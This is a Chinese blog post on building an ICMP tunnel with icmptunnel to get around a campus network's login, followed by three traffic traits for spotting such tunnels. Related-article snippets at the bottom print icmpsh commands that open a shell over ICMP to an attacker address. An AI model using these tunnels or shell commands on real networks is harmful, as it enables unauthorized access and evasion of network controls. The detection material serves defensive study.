icmp报文_ICMP隧道

最新推荐文章于 2024-01-02 19:01:38 发布
最新推荐文章于 2024-01-02 19:01:38 发布
阅读量185 收藏
点赞数
文章标签: icmp报文

83cd8044f100252376dfed4715b38c48.png

2018年小黑考上了某三本大学的计算机专业,在骄阳似火的9月为了喝阔乐,和办宽带上网,小黑选择了前者。校园宿舍用的是CMCC网络,需要进行认证才能上百度。为了一边喝阔乐一边上网,小黑开始了折腾的不归路。下面简单的分析一哈ICMP隧道是如何建立和使用的。[1]这都是2015年的技术了~

第一步:服务端启动隧道

d3485183647d7a091b69781b8b5c7b64.png

第二步:查看服务端的隧道IP、路由等信息

服务端IP地址多了一个10.0.1.1,这就是咱们的隧道地址。

37a4003b1e4982f30b1cd7065d550723.png

注意服务端的路由发生了变化:

63b8b3dab21e8b4738a36396729340f0.png

第三步:在客户端修改client.sh文件

ef619b31a73492e8171d7e2a43ba2c8d.png

第四步:在客户端运行隧道,出现successfully就成功了。

e23c8d8b99e8a06c6f2b75ba0112cf0a.png

再次检查客户端的路由,可以看到以后出去的路由都走咱们的隧道了。

ac292a36e6cc4f58fef8d16411aa6215.png

网页测试:第一次用的时候大约等了1分钟,可把我吓坏了,这么慢还玩啥~

39b66ddd4e9310f9c4a9a15935abef15.png

后来测试访问知乎的几个页面,每个请求大约1秒左右,亲身体验就是,越用越快了,哈哈,还是有点东西的。

v2-4eaf7884ddd26f6f5e46975e15a6fe0e_b.jpg

当成功建立ICMP隧道的时候,明显的感觉是服务端的ICMP报文数量暴涨,并且出现大量大于1k的报文,尤其是ICMP应答报文,简单总结有以下3个特征:

ICMP隧道特征1:ICMP应答报文可能比较大,很多个应答包都大于1k

307fd57431b6501ffc0c2000b76758a5.png

ICMP隧道特征2:ICMP数据段可能有明文信息,比如浏览器访问百度的时候,在Data里面就找到了baidu

c9b6a4d23deabb84c617c7144f40f623.png

ICMP隧道特征3:还可以在个别请求中找到HTTP请求信息,但是绝大部分看到的都是乱码

5a9d0ceaaa7a2867f7d8e23e06176a07.png

最后,ICMP隧道的整体架构:

2d99f790eb5aa0573cbcfd3fbd0e5c8c.png

代码是C语言写的,有空的时候来分析一下源码吧~

参考

  1. ^icmptunnel https://github.com/DhavalKapil/icmptunnel
weixin_39980596
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络层隧道技术之ICMP隧道(pingTunnel/IcmpTunnel)
谢公子的博客
03-05 6111
目录 ICMP隧道 使用ICMP搭建隧道(PingTunnel) 使用ICMP搭建隧道(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相...
icmp隧道
热门推荐
03-16 1万+
ICMP 隧道 原理 icmp报文除了必须要有的类型、校验和等等还可以携带一定长度的可选数据,这也就是我们可以用来搭建隧道的原因,不过每次报文携带得的字节不会很多,所以有点慢。 icmpsh icmpsh是一款使用简单,而且不需要管理员权限即可运行的程序,可以较为简答的搭建隧道并同时获得目标shell 攻击机是kali, IP地址:192.168.220.129 下载icmpsh 到本地 git clone https://github.com/inquisb/icmpsh.git #下载工具 apt-
icmp报文格式_隧道攻防之ICMP隧道
weixin_39853863的博客
11-24 625
ICMP隧道简介icmp协议简介ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。ICMP报文格式如下:其0-31是各...
ICMP隧道
javaEE_zero的博客
11-23 247
ICMP隧道的实现原理和防御方式
ICMP-Tx:ICMP隧道
07-03
另外,启动工具的脚本"start.py"需要root权限,这意味着该程序可能涉及到对系统级别资源的访问,比如直接操作网络接口发送自定义的ICMP报文,这样的操作通常需要管理员权限。 ICMP-Tx的用途可能包括网络故障排查、...
报文格式汇总-VXLAN报文格式.docx
06-22
对于其他上层协议,如ICMP,也会在此位置出现。 VXLAN报文的这种封装方式,使得它可以跨越三层网络进行传输,打破了传统的二层网络边界。通过VXLAN,不同物理位置的虚拟机可以位于同一个逻辑网络,实现了大规模的...
ipip6_packet.rar
08-20
抓包文件可能包含了使用隧道技术传输的各种类型的数据包,例如ICMP(Internet Control Message Protocol)、TCP(Transmission Control Protocol)和UDP(User Datagram Protocol)。ICMP用于网络诊断和错误报告,...
计算机网络试题__DEMO_.pdf
10-06
17. 当A发送数据到B时,始终不变的是IP报文的源地址,选项B正确,其他项如头部内容、MAC地址和长度都可能根据网络环境变化。 18. IPv4协议,片偏移的最大值是8191,因为它是13位表示的,答案是D。 19. 与86.32...
浅谈openstack使用linux_bridge实现vxlan网络
09-30
这样配置完成后,VXLAN隧道建立起来,控制节点和计算节点各自创建了VTEP(VXLAN Tunnel Endpoint)来完成封装和解封装数据包的工作。 5. 网络流量过程 网络流量的传输过程是:首先,VM产生的ICMP包发往网桥,然后在...
gtpv1隧道报文.pcapng
08-29
使用思博伦测试仪构造的gtpv1隧道报文隧道报文头有必选字段,可选字段,扩展头等
内网渗透系列:内网隧道ICMP隧道
闵行小鱼塘
07-06 3098
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习ICMP隧道
ICMP隧道搭建
dzqxwzoe的博客
08-09 120
通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。通过本次对icmp隧道穿透的讲解,我们掌握了如何在目标服务器不出网的情况下上线c2服务端的方法,后续我们将继续学习通过dns来搭建隧道的方法。
网络安全技术之内网安全-03-ICMP隧道
caigai5424的博客
07-10 776
icmp隧道技术,绕过防火墙限制
icmp隧道--icmpsh
ddr12231的博客
09-24 293
本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 sysctl -w net.ipv4.icmp_echo_ighore_all=1 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 icmpsh.exe -t UbantuIP 详细命令 -t...
icmpsh建立ICMP隧道
大方子
01-27 4789
Kali:192.168.61.145 Win7:192.168.61.128 Kali上先下载icmpsh git clone https://github.com/inquisb/icmpsh.git 安装python-impacket apt-get install python-impacket 关闭Kali系统自己的ping回复(实验完成后,记得设回0) 然后进入icmpsh文件夹内执行 # python icmpsh_m.py [攻击机IP][目标IP] python icmpsh_m
ICMP隧道分析与实现
墨痕诉清风的博客
05-20 751
ICMP数据包封装过程 ICMP头部分为三个字段 type 类型 (0回应,8请求) code 代码 checksum 校验和 所以在封装ICMP报文的时候也要按顺序去封装这几个字段 其余部分三个部分为为 标识符 ( identifier ),一般填写进程 PID 以区分其他 ping 进程; 报文序号 ( sequence number ),用于编号报文序列; 数据 ( data ),可以是任意数据; ICMP协议在实际传输数据包:
icmp隧道的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 8067
icmp隧道的利用
ICMP隐蔽隧道工具Pingtunnel搭建隧道(附搭建环境避坑超详细)
最新发布
huayimy的博客
01-02 1784
服务端(间跳板机):192.168.19.21(lan区段) & 192.168.203.144(nat模式)提前检查被控机win7的远程连接是否为开启状态,确认开启后,使用windows自带的远程桌面进行连接。在安装PingTunnel前,我们必须先要安装它的运行环境,否则安装失败。一台服务端(linux服务端,用于内网转,lan区段+nat模式)一台客户端(kali攻击机,lan区段)一台远控机器(win7,lan区段)-da:指定要转发的目标机器的IP。一台靶机(win7,nat模式)
ICMP与IGMP在互联网隧道配置的作用
ICMP报文主要有两类:差错报告报文和询问报文。差错报告报文包括但不限于目的站不可达、源站抑制、超时等,而询问报文则用于网络诊断,如ping命令所使用的回显请求和应答。 接下来,我们转向IGMP,它是专为IP组播...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值